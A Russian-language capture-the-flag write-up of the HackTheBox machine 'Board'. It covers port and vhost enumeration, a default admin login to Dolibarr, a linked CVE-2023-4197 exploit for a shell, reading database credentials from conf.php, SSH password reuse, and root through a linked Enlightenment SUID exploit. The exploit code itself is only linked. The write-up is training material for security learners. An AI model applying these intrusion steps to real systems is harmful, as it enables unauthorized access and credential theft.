Telegram / Boosty / Видео

Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.

Смотри на t.me/kiberdruzhinnik/362.

Также на https://boosty.to/kiberdruzhinnik/posts/e04389b5-923a-490b-b5bf-c038c18c16f8 я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.

Обзор сервисов

Быстро пробежимся по открытым портам:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:08
Completed NSE at 06:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:08
Completed NSE at 06:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.38 seconds

Веб

В адресе электронной почты видим название домена, поэтому занесем его в /etc/hosts:

alt text

$ sudo nano /etc/hosts
10.129.63.244 board.htb

Сразу же запустим сканирование с помощью gobuster, чтобы попробовать найти другие домены:

$ gobuster vhost -u http://board.htb -w ~/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://board.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /home/kiberdruzhinnik/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.5
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2024/05/26 09:11:59 Starting gobuster in VHOST enumeration mode
===============================================================
Found: crm.board.htb Status: 200 [Size: 6360]
Progress: 4988 / 4990 (99.96%)
===============================================================
2024/05/26 09:13:02 Finished
===============================================================

Нам повезло, и мы нашли такой. Сразу же заносим найденный домен в /etc/hosts по аналогии выше.

Пробуем зайти на него:

alt text

Первым же делом вводим admin:admin и провалимся в админку:

alt text

Воспользуемся https://github.com/alien-keric/CVE-2023-4197 и получим шелл:

alt text

Посмотрим в конфигурацию и обнаружим креды для базы данных MySQL:

$ cd /var/www/html/crm.board.htb/htdocs/conf/
$ cat conf.php
...
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='***';
$dolibarr_main_db_type='mysqli';
...

Далее заглянем в /etc/passwd:

...
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
...

Теперь просто попробуем залогиниться в качестве пользователя larissa с известным нам паролем:

sshpass -p'***' ssh [email protected]

alt text

Флаг пользователя

alt text

Повышение привилегий

В этом случае достаточно поискать SUID-бинарники и обнаружить вот такие:

$ find / -perm -4000 2>/dev/null
...
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
...

Почти в поиске сразу обнаружим повышение привилегий через enlightment_sys - подробности здесь https://www.exploit-db.com/exploits/51180 или здесь https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh.

Просто копируем содержимое скрипта и вызываем его:

alt text

Флаг суперпользователя

alt text